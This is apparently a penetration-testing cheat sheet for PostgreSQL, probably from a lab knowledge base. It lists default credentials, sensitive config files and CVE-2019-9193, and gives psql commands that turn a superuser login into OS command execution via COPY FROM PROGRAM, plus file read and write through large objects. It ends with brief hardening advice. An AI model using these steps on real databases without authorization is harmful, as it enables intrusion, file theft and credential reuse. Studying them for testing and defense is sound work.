PostgreSQL
aka postgres
Postgres on 5432. From a superuser session, COPY ... FROM PROGRAM is direct command execution, and large objects give arbitrary file read/write.
Ports
| Port | Proto | Notes |
|---|---|---|
5432 | tcp | PostgreSQL |
Fingerprint
- Banner / version via psql or nmap
- Default database postgres, default user postgres
Key files
| Path | Holds | Sensitive |
|---|---|---|
~/.pgpass | cached client credentials | sensitive |
pg_hba.conf | auth rules (trust lines are a gift) | sensitive |
postgresql.conf | server config and data dir |
Default / weak creds
postgres / postgres; weak app creds
Service users
postgres
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2019-9193 | COPY FROM PROGRAM command execution (9.3-11) |
Exploitation primitives
- COPY cmd_exec FROM PROGRAM 'id' runs OS commands as the postgres user
- Large objects (lo_import / lo_export) read and write arbitrary files
- Reuse looted DB creds for OS login; trust lines in pg_hba.conf allow passwordless local auth
Overview
PostgreSQL on 5432 becomes code execution the moment you have a superuser (or sufficiently privileged) login, via the COPY … FROM PROGRAM feature.
Exec
Connect:
psql -h <TARGET> -U postgresCreate a scratch table:
DROP TABLE IF EXISTS x; CREATE TABLE x(o text);Run a command via COPY:
COPY x FROM PROGRAM 'id';Read the output:
SELECT * FROM x;Hardening
Run Postgres as a low-priv user, restrict superuser, remove trust auth, and patch the COPY FROM PROGRAM CVE.
Seen on these machines 1
